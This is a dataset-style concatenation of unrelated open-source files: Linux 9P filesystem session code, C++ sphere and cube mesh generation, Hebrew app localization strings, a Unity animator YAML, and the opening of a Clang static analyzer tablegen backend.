#include <net/9p/transport.h>
#include "v9fs.h"
#include "v9fs_vfs.h"
#include "cache.h"
static DEFINE_SPINLOCK(v9fs_sessionlist_lock);
static LIST_HEAD(v9fs_sessionlist);
struct kmem_cache *v9fs_inode_cache;
/*
* Option Parsing (code inspired by NFS code)
* NOTE: each transport will parse its own options
*/
enum {
/* Options that take integer arguments */
Opt_debug, Opt_dfltuid, Opt_dfltgid, Opt_afid,
/* String options */
Opt_uname, Opt_remotename, Opt_cache, Opt_cachetag,
/* Options that take no arguments */
Opt_nodevmap,
/* Cache options */
Opt_cache_loose, Opt_fscache, Opt_mmap,
/* Access options */
Opt_access, Opt_posixacl,
/* Error token */
Opt_err
};
static const match_table_t tokens = {
{Opt_debug, "debug=%x"},
{Opt_dfltuid, "dfltuid=%u"},
{Opt_dfltgid, "dfltgid=%u"},
{Opt_afid, "afid=%u"},
{Opt_uname, "uname=%s"},
{Opt_remotename, "aname=%s"},
{Opt_nodevmap, "nodevmap"},
{Opt_cache, "cache=%s"},
{Opt_cache_loose, "loose"},
{Opt_fscache, "fscache"},
{Opt_mmap, "mmap"},
{Opt_cachetag, "cachetag=%s"},
{Opt_access, "access=%s"},
{Opt_posixacl, "posixacl"},
{Opt_err, NULL}
};
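/*
* Illustrative (hypothetical) mount option string exercising the tokens above;
* transport-specific options such as the server address are parsed separately
* by the selected 9P transport:
*
*   "debug=0x4,dfltuid=1000,dfltgid=1000,cache=loose,access=user,posixacl"
*/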
/* Interpret mount options for cache mode */
static int get_cache_mode(char *s)
{
int version = -EINVAL;
if (!strcmp(s, "loose")) {
version = CACHE_LOOSE;
p9_debug(P9_DEBUG_9P, "Cache mode: loose\n");
} else if (!strcmp(s, "fscache")) {
version = CACHE_FSCACHE;
p9_debug(P9_DEBUG_9P, "Cache mode: fscache\n");
} else if (!strcmp(s, "mmap")) {
version = CACHE_MMAP;
p9_debug(P9_DEBUG_9P, "Cache mode: mmap\n");
} else if (!strcmp(s, "none")) {
version = CACHE_NONE;
p9_debug(P9_DEBUG_9P, "Cache mode: none\n");
} else
pr_info("Unknown Cache mode %s\n", s);
return version;
}
/**
* v9fs_parse_options - parse mount options into session structure
* @v9ses: existing v9fs session information
* @opts: mount options string to parse
*
* Return 0 upon success, -ERRNO upon failure.
*/
static int v9fs_parse_options(struct v9fs_session_info *v9ses, char *opts)
{
char *options, *tmp_options;
substring_t args[MAX_OPT_ARGS];
char *p;
int option = 0;
char *s, *e;
int ret = 0;
/* setup defaults */
v9ses->afid = ~0;
v9ses->debug = 0;
v9ses->cache = CACHE_NONE;
#ifdef CONFIG_9P_FSCACHE
v9ses->cachetag = NULL;
#endif
if (!opts)
return 0;
tmp_options = kstrdup(opts, GFP_KERNEL);
if (!tmp_options) {
ret = -ENOMEM;
goto fail_option_alloc;
}
options = tmp_options;
while ((p = strsep(&options, ",")) != NULL) {
int token, r;
if (!*p)
continue;
token = match_token(p, tokens, args);
switch (token) {
case Opt_debug:
r = match_int(&args[0], &option);
if (r < 0) {
p9_debug(P9_DEBUG_ERROR,
"integer field, but no integer?\n");
ret = r;
continue;
}
v9ses->debug = option;
#ifdef CONFIG_NET_9P_DEBUG
p9_debug_level = option;
#endif
break;
case Opt_dfltuid:
r = match_int(&args[0], &option);
if (r < 0) {
p9_debug(P9_DEBUG_ERROR,
"integer field, but no integer?\n");
ret = r;
continue;
}
v9ses->dfltuid = make_kuid(current_user_ns(), option);
if (!uid_valid(v9ses->dfltuid)) {
p9_debug(P9_DEBUG_ERROR,
"uid field, but not a uid?\n");
ret = -EINVAL;
continue;
}
break;
case Opt_dfltgid:
r = match_int(&args[0], &option);
if (r < 0) {
p9_debug(P9_DEBUG_ERROR,
"integer field, but no integer?\n");
ret = r;
continue;
}
v9ses->dfltgid = make_kgid(current_user_ns(), option);
if (!gid_valid(v9ses->dfltgid)) {
p9_debug(P9_DEBUG_ERROR,
"gid field, but not a gid?\n");
ret = -EINVAL;
continue;
}
break;
case Opt_afid:
r = match_int(&args[0], &option);
if (r < 0) {
p9_debug(P9_DEBUG_ERROR,
"integer field, but no integer?\n");
ret = r;
continue;
}
v9ses->afid = option;
break;
case Opt_uname:
kfree(v9ses->uname);
v9ses->uname = match_strdup(&args[0]);
if (!v9ses->uname) {
ret = -ENOMEM;
goto free_and_return;
}
break;
case Opt_remotename:
kfree(v9ses->aname);
v9ses->aname = match_strdup(&args[0]);
if (!v9ses->aname) {
ret = -ENOMEM;
goto free_and_return;
}
break;
case Opt_nodevmap:
v9ses->nodev = 1;
break;
case Opt_cache_loose:
v9ses->cache = CACHE_LOOSE;
break;
case Opt_fscache:
v9ses->cache = CACHE_FSCACHE;
break;
case Opt_mmap:
v9ses->cache = CACHE_MMAP;
break;
case Opt_cachetag:
#ifdef CONFIG_9P_FSCACHE
v9ses->cachetag = match_strdup(&args[0]);
#endif
break;
case Opt_cache:
s = match_strdup(&args[0]);
if (!s) {
ret = -ENOMEM;
p9_debug(P9_DEBUG_ERROR,
"problem allocating copy of cache arg\n");
goto free_and_return;
}
ret = get_cache_mode(s);
if (ret == -EINVAL) {
kfree(s);
goto free_and_return;
}
v9ses->cache = ret;
kfree(s);
break;
case Opt_access:
s = match_strdup(&args[0]);
if (!s) {
ret = -ENOMEM;
p9_debug(P9_DEBUG_ERROR,
"problem allocating copy of access arg\n");
goto free_and_return;
}
v9ses->flags &= ~V9FS_ACCESS_MASK;
if (strcmp(s, "user") == 0)
v9ses->flags |= V9FS_ACCESS_USER;
else if (strcmp(s, "any") == 0)
v9ses->flags |= V9FS_ACCESS_ANY;
else if (strcmp(s, "client") == 0) {
v9ses->flags |= V9FS_ACCESS_CLIENT;
} else {
uid_t uid;
v9ses->flags |= V9FS_ACCESS_SINGLE;
uid = simple_strtoul(s, &e, 10);
if (*e != '\0') {
ret = -EINVAL;
pr_info("Unknown access argument %s\n",
s);
kfree(s);
goto free_and_return;
}
v9ses->uid = make_kuid(current_user_ns(), uid);
if (!uid_valid(v9ses->uid)) {
ret = -EINVAL;
pr_info("Uknown uid %s\n", s);
kfree(s);
goto free_and_return;
}
}
kfree(s);
break;
case Opt_posixacl:
#ifdef CONFIG_9P_FS_POSIX_ACL
v9ses->flags |= V9FS_POSIX_ACL;
#else
p9_debug(P9_DEBUG_ERROR,
"Not defined CONFIG_9P_FS_POSIX_ACL. Ignoring posixacl option\n");
#endif
break;
default:
continue;
}
}
free_and_return:
kfree(tmp_options);
fail_option_alloc:
return ret;
}
/**
* v9fs_session_init - initialize session
* @v9ses: session information structure
* @dev_name: device being mounted
* @data: options
*
*/
struct p9_fid *v9fs_session_init(struct v9fs_session_info *v9ses,
const char *dev_name, char *data)
{
struct p9_fid *fid;
int rc = -ENOMEM;
v9ses->uname = kstrdup(V9FS_DEFUSER, GFP_KERNEL);
if (!v9ses->uname)
goto err_names;
v9ses->aname = kstrdup(V9FS_DEFANAME, GFP_KERNEL);
if (!v9ses->aname)
goto err_names;
init_rwsem(&v9ses->rename_sem);
rc = bdi_setup_and_register(&v9ses->bdi, "9p");
if (rc)
goto err_names;
v9ses->uid = INVALID_UID;
v9ses->dfltuid = V9FS_DEFUID;
v9ses->dfltgid = V9FS_DEFGID;
v9ses->clnt = p9_client_create(dev_name, data);
if (IS_ERR(v9ses->clnt)) {
rc = PTR_ERR(v9ses->clnt);
p9_debug(P9_DEBUG_ERROR, "problem initializing 9p client\n");
goto err_bdi;
}
v9ses->flags = V9FS_ACCESS_USER;
if (p9_is_proto_dotl(v9ses->clnt)) {
v9ses->flags = V9FS_ACCESS_CLIENT;
v9ses->flags |= V9FS_PROTO_2000L;
} else if (p9_is_proto_dotu(v9ses->clnt)) {
v9ses->flags |= V9FS_PROTO_2000U;
}
rc = v9fs_parse_options(v9ses, data);
if (rc < 0)
goto err_clnt;
v9ses->maxdata = v9ses->clnt->msize - P9_IOHDRSZ;
if (!v9fs_proto_dotl(v9ses) &&
((v9ses->flags & V9FS_ACCESS_MASK) == V9FS_ACCESS_CLIENT)) {
/*
* We support ACCESS_CLIENT only for dotl.
* Fall back to ACCESS_USER
*/
v9ses->flags &= ~V9FS_ACCESS_MASK;
v9ses->flags |= V9FS_ACCESS_USER;
}
/*FIXME !! */
/* for legacy mode, fall back to V9FS_ACCESS_ANY */
if (!(v9fs_proto_dotu(v9ses) || v9fs_proto_dotl(v9ses)) &&
((v9ses->flags&V9FS_ACCESS_MASK) == V9FS_ACCESS_USER)) {
v9ses->flags &= ~V9FS_ACCESS_MASK;
v9ses->flags |= V9FS_ACCESS_ANY;
v9ses->uid = INVALID_UID;
}
if (!v9fs_proto_dotl(v9ses) ||
!((v9ses->flags & V9FS_ACCESS_MASK) == V9FS_ACCESS_CLIENT)) {
/*
* We support ACL checks on client only if the protocol is
* 9P2000.L and access is V9FS_ACCESS_CLIENT.
*/
v9ses->flags &= ~V9FS_ACL_MASK;
}
fid = p9_client_attach(v9ses->clnt, NULL, v9ses->uname, INVALID_UID,
v9ses->aname);
if (IS_ERR(fid)) {
rc = PTR_ERR(fid);
p9_debug(P9_DEBUG_ERROR, "cannot attach\n");
goto err_clnt;
}
if ((v9ses->flags & V9FS_ACCESS_MASK) == V9FS_ACCESS_SINGLE)
fid->uid = v9ses->uid;
else
fid->uid = INVALID_UID;
#ifdef CONFIG_9P_FSCACHE
/* register the session for caching */
v9fs_cache_session_get_cookie(v9ses);
#endif
spin_lock(&v9fs_sessionlist_lock);
list_add(&v9ses->slist, &v9fs_sessionlist);
spin_unlock(&v9fs_sessionlist_lock);
return fid;
err_clnt:
p9_client_destroy(v9ses->clnt);
err_bdi:
bdi_destroy(&v9ses->bdi);
err_names:
kfree(v9ses->uname);
kfree(v9ses->aname);
return ERR_PTR(rc);
}
/**
* v9fs_session_close - shutdown a session
* @v9ses: session information structure
*
*/
void v9fs_session_close(struct v9fs_session_info *v9ses)
{
if (v9ses->clnt) {
p9_client_destroy(v9ses->clnt);
v9ses->clnt = NULL;
}
#ifdef CONFIG_9P_FSCACHE
if (v9ses->fscache) {
v9fs_cache_session_put_cookie(v9ses);
kfree(v9ses->cachetag);
}
#endif
kfree(v9ses->uname);
kfree(v9ses->aname);
bdi_destroy(&v9ses->bdi);
spin_lock(&v9fs_sessionlist_lock);
list_del(&v9ses->slist);
spin_unlock(&v9fs_sessionlist_lock);
}
/**
* v9fs_session_cancel - terminate a session
* @v9ses: session to terminate
*
* mark transport as disconnected and cancel all pending requests.
*/
void v9fs_session_cancel(struct v9fs_session_info *v9ses) {
p9_debug(P9_DEBUG_ERROR, "cancel session %p\n", v9ses);
p9_client_disconnect(v9ses->clnt);
}
/**
* v9fs_session_begin_cancel - Begin termination of a session
* @v9ses: session to terminate
*
* After this call we don't allow any request other than clunk.
*/
void v9fs_session_begin_cancel(struct v9fs_session_info *v9ses)
{
p9_debug(P9_DEBUG_ERROR, "begin cancel session %p\n", v9ses);
p9_client_begin_disconnect(v9ses->clnt);
}
extern int v9fs_error_init(void);
static struct kobject *v9fs_kobj;
#ifdef CONFIG_9P_FSCACHE
/**
* caches_show - list caches associated with a session
*
* Returns the size of buffer written.
*/
static ssize_t caches_show(struct kobject *kobj,
struct kobj_attribute *attr,
char *buf)
{
ssize_t n = 0, count = 0, limit = PAGE_SIZE;
struct v9fs_session_info *v9ses;
spin_lock(&v9fs_sessionlist_lock);
list_for_each_entry(v9ses, &v9fs_sessionlist, slist) {
if (v9ses->cachetag) {
n = snprintf(buf, limit, "%s\n", v9ses->cachetag);
if (n < 0) {
count = n;
break;
}
count += n;
limit -= n;
}
}
spin_unlock(&v9fs_sessionlist_lock);
return count;
}
static struct kobj_attribute v9fs_attr_cache = __ATTR_RO(caches);
#endif /* CONFIG_9P_FSCACHE */
static struct attribute *v9fs_attrs[] = {
#ifdef CONFIG_9P_FSCACHE
&v9fs_attr_cache.attr,
#endif
NULL,
};
static struct attribute_group v9fs_attr_group = {
.attrs = v9fs_attrs,
};
/**
* v9fs_sysfs_init - Initialize the v9fs sysfs interface
*
*/
static int __init v9fs_sysfs_init(void)
{
v9fs_kobj = kobject_create_and_add("9p", fs_kobj);
if (!v9fs_kobj)
return -ENOMEM;
if (sysfs_create_group(v9fs_kobj, &v9fs_attr_group)) {
kobject_put(v9fs_kobj);
return -ENOMEM;
}
return 0;
}
/**
* v9fs_sysfs_cleanup - Unregister the v9fs sysfs interface
*
*/
static void v9fs_sysfs_cleanup(void)
{
sysfs_remove_group(v9fs_kobj, &v9fs_attr_group);
kobject_put(v9fs_kobj);
}
static void v9fs_inode_init_once(void *foo)
{
struct v9fs_inode *v9inode = (struct v9fs_inode *)foo;
#ifdef CONFIG_9P_FSCACHE
v9inode->fscache = NULL;
#endif
memset(&v9inode->qid, 0, sizeof(v9inode->qid));
inode_init_once(&v9inode->vfs_inode);
}
/**
* v9fs_init_inode_cache - initialize a cache for 9P
* Returns 0 on success.
*/
static int v9fs_init_inode_cache(void)
{
v9fs_inode_cache = kmem_cache_create("v9fs_inode_cache",
sizeof(struct v9fs_inode),
0, (SLAB_RECLAIM_ACCOUNT|
SLAB_MEM_SPREAD|SLAB_ACCOUNT),
v9fs_inode_init_once);
if (!v9fs_inode_cache)
return -ENOMEM;
return 0;
}
/**
* v9fs_destroy_inode_cache - destroy the cache of 9P inode
*
*/
static void v9fs_destroy_inode_cache(void)
{
/*
* Make sure all delayed rcu free inodes are flushed before we
* destroy cache.
*/
rcu_barrier();
kmem_cache_destroy(v9fs_inode_cache);
}
static int v9fs_cache_register(void)
{
int ret;
ret = v9fs_init_inode_cache();
if (ret < 0)
return ret;
#ifdef CONFIG_9P_FSCACHE
ret = fscache_register_netfs(&v9fs_cache_netfs);
if (ret < 0)
v9fs_destroy_inode_cache();
#endif
return ret;
}
static void v9fs_cache_unregister(void)
{
v9fs_destroy_inode_cache();
#ifdef CONFIG_9P_FSCACHE
fscache_unregister_netfs(&v9fs_cache_netfs);
#endif
}
/**
* init_v9fs - Initialize module
*
*/
static int __init init_v9fs(void)
{
int err;
pr_info("Installing v9fs 9p2000 file system support\n");
/* TODO: Setup list of registered transport modules */
err = v9fs_cache_register();
if (err < 0) {
pr_err("Failed to register v9fs for caching\n");
return err;
}
err = v9fs_sysfs_init();
if (err < 0) {
pr_err("Failed to register with sysfs\n");
goto out_cache;
}
err = register_filesystem(&v9fs_fs_type);
if (err < 0) {
pr_err("Failed to register filesystem\n");
goto out_sysfs_cleanup;
}
return 0;
out_sysfs_cleanup:
v9fs_sysfs_cleanup();
out_cache:
v9fs_cache_unregister();
return err;
}
/**
* exit_v9fs - shutdown module
*
*/
static void __exit exit_v9fs(void)
{
v9fs_sysfs_cleanup();
v9fs_cache_unregister();
unregister_filesystem(&v9fs_fs_type);
}
module_init(init_v9fs)
module_exit(exit_v9fs)
MODULE_AUTHOR("Latchesar Ionkov <[email protected]>");
MODULE_AUTHOR("Eric Van Hensbergen <[email protected]>");
MODULE_AUTHOR("Ron Minnich <[email protected]>");
MODULE_LICENSE("GPL");
| {
"pile_set_name": "Github"
} |
// Copyright 2015 XLGAMES Inc.
//
// Distributed under the MIT License (See
// accompanying file "LICENSE" or the website
// http://www.opensource.org/licenses/mit-license.php)
#include "VisualisationGeo.h"
#include "../../RenderCore/Metal/InputLayout.h"
#include "../../RenderCore/Metal/Format.h"
namespace ToolsRig
{
namespace Internal
{
static RenderCore::Metal::InputElementDesc Vertex2D_InputLayout_[] = {
RenderCore::Metal::InputElementDesc( "POSITION", 0, RenderCore::Metal::NativeFormat::R32G32_FLOAT ),
RenderCore::Metal::InputElementDesc( "TEXCOORD", 0, RenderCore::Metal::NativeFormat::R32G32_FLOAT )
};
static RenderCore::Metal::InputElementDesc Vertex3D_InputLayout_[] = {
RenderCore::Metal::InputElementDesc( "POSITION", 0, RenderCore::Metal::NativeFormat::R32G32B32_FLOAT ),
RenderCore::Metal::InputElementDesc( "NORMAL", 0, RenderCore::Metal::NativeFormat::R32G32B32_FLOAT ),
RenderCore::Metal::InputElementDesc( "TEXCOORD", 0, RenderCore::Metal::NativeFormat::R32G32_FLOAT ),
RenderCore::Metal::InputElementDesc( "TEXTANGENT", 0, RenderCore::Metal::NativeFormat::R32G32B32A32_FLOAT )//,
//RenderCore::Metal::InputElementDesc( "TEXBITANGENT", 0, RenderCore::Metal::NativeFormat::R32G32B32_FLOAT )
};
}
std::pair<const RenderCore::Metal::InputElementDesc*, size_t> Vertex2D_InputLayout = std::make_pair(Internal::Vertex2D_InputLayout_, dimof(Internal::Vertex2D_InputLayout_));
std::pair<const RenderCore::Metal::InputElementDesc*, size_t> Vertex3D_InputLayout = std::make_pair(Internal::Vertex3D_InputLayout_, dimof(Internal::Vertex3D_InputLayout_));
static void GeodesicSphere_Subdivide(const Float3 &v1, const Float3 &v2, const Float3 &v3, std::vector<Float3> &sphere_points, unsigned int depth)
{
if(depth == 0)
{
sphere_points.push_back(v1);
sphere_points.push_back(v2);
sphere_points.push_back(v3);
return;
}
Float3 v12 = Normalize(v1 + v2);
Float3 v23 = Normalize(v2 + v3);
Float3 v31 = Normalize(v3 + v1);
GeodesicSphere_Subdivide( v1, v12, v31, sphere_points, depth - 1);
GeodesicSphere_Subdivide( v2, v23, v12, sphere_points, depth - 1);
GeodesicSphere_Subdivide( v3, v31, v23, sphere_points, depth - 1);
GeodesicSphere_Subdivide(v12, v23, v31, sphere_points, depth - 1);
}
static std::vector<Float3> BuildGeodesicSpherePts(int detail)
{
//
// Basic geodesic sphere generation code
// Based on a document from http://www.opengl.org.ru/docs/pg/0208.html
//
const float X = 0.525731112119133606f;
const float Z = 0.850650808352039932f;
const Float3 vdata[12] =
{
Float3( -X, 0.0, Z ), Float3( X, 0.0, Z ), Float3( -X, 0.0, -Z ), Float3( X, 0.0, -Z ),
Float3( 0.0, Z, X ), Float3( 0.0, Z, -X ), Float3( 0.0, -Z, X ), Float3( 0.0, -Z, -X ),
Float3( Z, X, 0.0 ), Float3( -Z, X, 0.0 ), Float3( Z, -X, 0.0 ), Float3( -Z, -X, 0.0 )
};
int tindices[20][3] =
{
{ 0, 4, 1 }, { 0, 9, 4 }, { 9, 5, 4 }, { 4, 5, 8 }, { 4, 8, 1 },
{ 8, 10, 1 }, { 8, 3, 10 }, { 5, 3, 8 }, { 5, 2, 3 }, { 2, 7, 3 },
{ 7, 10, 3 }, { 7, 6, 10 }, { 7, 11, 6 }, { 11, 0, 6 }, { 0, 1, 6 },
{ 6, 1, 10 }, { 9, 0, 11 }, { 9, 11, 2 }, { 9, 2, 5 }, { 7, 2, 11 }
};
std::vector<Float3> spherePoints;
for(int i = 0; i < 20; i++) {
// note -- flip here to flip the winding
GeodesicSphere_Subdivide(
vdata[tindices[i][0]], vdata[tindices[i][2]],
vdata[tindices[i][1]], spherePoints, detail);
}
return spherePoints;
}
std::vector<Internal::Vertex3D> BuildGeodesicSphere(int detail)
{
// build a geodesic sphere at the origin with radius 1 //
auto pts = BuildGeodesicSpherePts(detail);
std::vector<Internal::Vertex3D> result;
result.reserve(pts.size());
const float texWrapsX = 8.f;
const float texWrapsY = 4.f;
for (auto i=pts.cbegin(); i!=pts.cend(); ++i) {
Internal::Vertex3D vertex;
vertex._position = *i;
vertex._normal = Normalize(*i); // centre is the origin, so normal points towards the position
// Texture coordinates based on longitude / latitude
// texWrapsX wraps horizontally and texWrapsY wraps vertically (8 and 4 here)
// let's map [-0.5f*pi, .5f*pi] -> [0.f, 1.f];
float latitude = XlASin((*i)[2]);
float longitude = XlATan2((*i)[1], (*i)[0]);
latitude = 1.f - (latitude + .5f * gPI) / gPI * texWrapsY;
longitude = (longitude + .5f * gPI) / gPI * (texWrapsX / 2.f);
vertex._texCoord = Float2(longitude, latitude);
Float3 bt(0.f, 0.f, -1.f);
bt = bt - vertex._normal * Dot(vertex._normal, bt);
if (MagnitudeSquared(bt) < 1e-3f) {
// this is a vertex on a singularity (straight up or straight down)
vertex._tangent = Float4(0.f, 0.f, 0.f, 0.f);
// vertex._bitangent = Float3(0.f, 0.f, 0.f);
} else {
bt = Normalize(bt);
// vertex._bitangent = bt;
// cross(bitangent, tangent) * handiness == normal, so...
Float3 t = Normalize(Cross(vertex._normal, bt));
vertex._tangent = Expand(t, 1.f);
auto test = Float3(Cross(bt, Truncate(vertex._tangent)) * vertex._tangent[3]);
assert(Equivalent(test, vertex._normal, 1e-4f));
// tangent should also be the 2d cross product of the XY position (according to the shape of a sphere)
auto test2 = Normalize(Float3(-(*i)[1], (*i)[0], 0.f));
assert(Equivalent(test2, Truncate(vertex._tangent), 1e-4f));
// make sure handiness is right
// assert(Equivalent(vertex._bitangent[2], 0.f, 1e-4f));
// auto testLong = XlATan2((*i)[1] + 0.05f * vertex._bitangent[1], (*i)[0] + 0.05f * vertex._bitangent[0]);
// testLong = (testLong + .5f * gPI) / gPI;
// assert(testLong > longitude);
}
result.push_back(vertex);
}
// there is a problem case on triangles that wrap around in longitude. Along these triangles, the
// texture coordinates will appear to wrap backwards through the entire texture. We can use the
// tangents to find these triangles, because the tangents will appear to be in the wrong direction
// for these triangles.
unsigned triCount = unsigned(result.size() / 3);
for (unsigned t=0; t<triCount; ++t) {
auto& A = result[t*3+0];
auto& B = result[t*3+1];
auto& C = result[t*3+2];
// problems around the singularity straight up or straight down
if (MagnitudeSquared(A._tangent) < 1e-4f || MagnitudeSquared(B._tangent) < 1e-4f || MagnitudeSquared(C._tangent) < 1e-4f)
continue;
if (XlAbs(B._texCoord[0] - A._texCoord[0]) > 1e-3f) {
assert(Dot(Truncate(B._tangent), Truncate(A._tangent)) > 0.f); // both tangents should point in roughly the same direction
bool rightWay1 = (Dot(B._position - A._position, Truncate(A._tangent)) < 0.f) == ((B._texCoord[0] - A._texCoord[0]) < 0.f);
if (!rightWay1) {
if (B._texCoord[0] < A._texCoord[0]) B._texCoord[0] += texWrapsX;
else A._texCoord[0] += texWrapsX;
}
}
if (XlAbs(C._texCoord[0] - A._texCoord[0]) > 1e-3f) {
assert(Dot(Truncate(C._tangent), Truncate(A._tangent)) > 0.f); // both tangents should point in roughly the same direction
bool rightWay1 = (Dot(C._position - A._position, Truncate(A._tangent)) < 0.f) == ((C._texCoord[0] - A._texCoord[0]) < 0.f);
if (!rightWay1) {
if (C._texCoord[0] < A._texCoord[0]) C._texCoord[0] += texWrapsX;
else A._texCoord[0] += texWrapsX;
}
}
if (XlAbs(C._texCoord[0] - B._texCoord[0]) > 1e-3f) {
assert(Dot(Truncate(C._tangent), Truncate(B._tangent)) > 0.f); // both tangents should point in roughly the same direction
bool rightWay1 = (Dot(C._position - B._position, Truncate(B._tangent)) < 0.f) == ((C._texCoord[0] - B._texCoord[0]) < 0.f);
if (!rightWay1) {
if (C._texCoord[0] < B._texCoord[0]) C._texCoord[0] += texWrapsX;
else B._texCoord[0] += texWrapsX;
}
}
}
return result;
}
std::vector<Internal::Vertex3D> BuildCube()
{
// build a basic cube at the origin with radius 1. All edges are "sharp" edges //
Float3 normals[] = {
Float3(0.f, 0.f, -1.f), Float3(0.f, 0.f, 1.f),
Float3(1.f, 0.f, 0.f), Float3(-1.f, 0.f, 0.f),
Float3(0.f, 1.f, 0.f), Float3(0.f, -1.f, 0.f)
};
Float3 Us[] = {
Float3(1.f, 0.f, 0.f), Float3(-1.f, 0.f, 0.f),
Float3(0.f, 1.f, 0.f), Float3(0.f, -1.f, 0.f),
Float3(-1.f, 0.f, 0.f), Float3(1.f, 0.f, 0.f)
};
Float3 Vs[] = {
Float3(0.f, 1.f, 0.f), Float3(0.f, 1.f, 0.f),
Float3(0.f, 0.f, -1.f), Float3(0.f, 0.f, -1.f),
Float3(0.f, 0.f, -1.f), Float3(0.f, 0.f, -1.f)
};
float faceCoord[4][2] = {{ -1.f, -1.f }, { -1.f, 1.f }, { 1.f, -1.f }, { 1.f, 1.f }};
std::vector<Internal::Vertex3D> result;
for (unsigned c=0; c<6; ++c) {
auto normal = normals[c], u = Us[c], v = Vs[c];
Internal::Vertex3D a[4];
for (unsigned q=0; q<4; ++q) {
a[q]._position = normal + faceCoord[q][0] * u + faceCoord[q][1] * v;
a[q]._normal = normal;
a[q]._texCoord = Float2(.5f * faceCoord[q][0] + .5f, .5f * faceCoord[q][1] + .5f);
a[q]._tangent = Expand(u, 1.f);
a[q]._tangent[3] = (Dot(Cross(v, u), normal) < 0.f) ? -1.f : 1.f;
// a[q]._bitangent = v;
}
result.push_back(a[0]); result.push_back(a[1]); result.push_back(a[2]);
result.push_back(a[2]); result.push_back(a[1]); result.push_back(a[3]);
}
return result;
}
}
| {
"pile_set_name": "Github"
} |
/* Title for alert dialog explaining that a user must be signed in to use AutoFill. */
"autofill.signInRequired" = "נדרשת התחברות";
/* Cancel button title */
"cancel" = "ביטול";
/* Delete button title */
"delete" = "מחיקה";
/* Ok button title */
"ok" = "אישור";
/* Sign in button text */
"signIn" = "התחברות";
/* This is the message displayed when syncing entries from the server times out */
"sync.timeout" = "תם הזמן שהוקצב לסנכרון";
/* Placeholder text when the user’s email is unavailable while unlocking the app, shown in Touch ID and passcode prompts */
"unlock_placeholder" = "פעולה זו תשחרר את היישומון.";
/* Placeholder text when there is no username. String should include appropriate open/close parenthetical or similar symbols to indicate this is a placeholder, not a real username. */
"username_placeholder" = "(אין שם משתמש)";
| {
"pile_set_name": "Github"
} |
%YAML 1.1
%TAG !u! tag:unity3d.com,2011:
--- !u!91 &9100000
AnimatorController:
m_ObjectHideFlags: 0
m_PrefabParentObject: {fileID: 0}
m_PrefabInternal: {fileID: 0}
m_Name: Ethan
serializedVersion: 5
m_AnimatorParameters: []
m_AnimatorLayers:
- serializedVersion: 5
m_Name: Base Layer
m_StateMachine: {fileID: 110785770}
m_Mask: {fileID: 0}
m_Motions: []
m_Behaviours: []
m_BlendingMode: 0
m_SyncedLayerIndex: -1
m_DefaultWeight: 0
m_IKPass: 0
m_SyncedLayerAffectsTiming: 0
m_Controller: {fileID: 9100000}
--- !u!1102 &110294526
AnimatorState:
serializedVersion: 5
m_ObjectHideFlags: 1
m_PrefabParentObject: {fileID: 0}
m_PrefabInternal: {fileID: 0}
m_Name: HumanoidRun
m_Speed: 1
m_CycleOffset: 0
m_Transitions: []
m_StateMachineBehaviours: []
m_Position: {x: 50, y: 50, z: 0}
m_IKOnFeet: 0
m_WriteDefaultValues: 1
m_Mirror: 0
m_SpeedParameterActive: 0
m_MirrorParameterActive: 0
m_CycleOffsetParameterActive: 0
m_Motion: {fileID: 7400000, guid: 1cb8ed3cbba15f0479fbae54e0a963df, type: 3}
m_Tag:
m_SpeedParameter:
m_MirrorParameter:
m_CycleOffsetParameter:
--- !u!1107 &110785770
AnimatorStateMachine:
serializedVersion: 5
m_ObjectHideFlags: 1
m_PrefabParentObject: {fileID: 0}
m_PrefabInternal: {fileID: 0}
m_Name: Base Layer
m_ChildStates:
- serializedVersion: 1
m_State: {fileID: 110294526}
m_Position: {x: 255, y: 78, z: 0}
m_ChildStateMachines: []
m_AnyStateTransitions: []
m_EntryTransitions: []
m_StateMachineTransitions: {}
m_StateMachineBehaviours: []
m_AnyStatePosition: {x: 50, y: 20, z: 0}
m_EntryPosition: {x: 50, y: 120, z: 0}
m_ExitPosition: {x: 800, y: 120, z: 0}
m_ParentStateMachinePosition: {x: 800, y: 20, z: 0}
m_DefaultState: {fileID: 110294526}
| {
"pile_set_name": "Github"
} |
//=- ClangSACheckersEmitter.cpp - Generate Clang SA checkers tables -*- C++ -*-
//
// The LLVM Compiler Infrastructure
//
// This file is distributed under the University of Illinois Open Source
// License. See LICENSE.TXT for details.
//
//===----------------------------------------------------------------------===//
//
// This tablegen backend emits Clang Static Analyzer checkers tables.
//
//===----------------------------------------------------------------------===//
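//
// Rough sketch of what this backend consumes and emits (record and value names
// below are hypothetical; the real definitions live in the checker .td files).
// Each Package record carries PackageName/ParentPackage/Group/Hidden and each
// Checker record carries CheckerName/ParentPackage/Group/Hidden/HelpText/DescFile;
// these are turned into GROUP(...), PACKAGE(...) and CHECKER(...) entries guarded
// by GET_GROUPS / GET_PACKAGES / GET_CHECKERS. For example, a checker named
// "core.DivideZero" would come out roughly as:
//
//   CHECKER("core.DivideZero", DivZeroChecker, DivZeroChecker.cpp,
//           "Check for division by zero", -1, false)
//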
#include "llvm/ADT/DenseSet.h"
#include "llvm/TableGen/Error.h"
#include "llvm/TableGen/Record.h"
#include "llvm/TableGen/TableGenBackend.h"
#include <map>
#include <string>
using namespace llvm;
//===----------------------------------------------------------------------===//
// Static Analyzer Checkers Tables generation
//===----------------------------------------------------------------------===//
/// \brief True if it is specified hidden or a parent package is specified
/// as hidden, otherwise false.
static bool isHidden(const Record &R) {
if (R.getValueAsBit("Hidden"))
return true;
// Not declared as hidden, check the parent package if it is hidden.
if (DefInit *DI = dyn_cast<DefInit>(R.getValueInit("ParentPackage")))
return isHidden(*DI->getDef());
return false;
}
static bool isCheckerNamed(const Record *R) {
return !R->getValueAsString("CheckerName").empty();
}
static std::string getPackageFullName(const Record *R);
static std::string getParentPackageFullName(const Record *R) {
std::string name;
if (DefInit *DI = dyn_cast<DefInit>(R->getValueInit("ParentPackage")))
name = getPackageFullName(DI->getDef());
return name;
}
static std::string getPackageFullName(const Record *R) {
std::string name = getParentPackageFullName(R);
if (!name.empty()) name += ".";
return name + R->getValueAsString("PackageName");
}
static std::string getCheckerFullName(const Record *R) {
std::string name = getParentPackageFullName(R);
if (isCheckerNamed(R)) {
if (!name.empty()) name += ".";
name += R->getValueAsString("CheckerName");
}
return name;
}
static std::string getStringValue(const Record &R, StringRef field) {
if (StringInit *SI = dyn_cast<StringInit>(R.getValueInit(field)))
return SI->getValue();
return std::string();
}
namespace {
struct GroupInfo {
llvm::DenseSet<const Record*> Checkers;
llvm::DenseSet<const Record *> SubGroups;
bool Hidden;
unsigned Index;
GroupInfo() : Hidden(false) { }
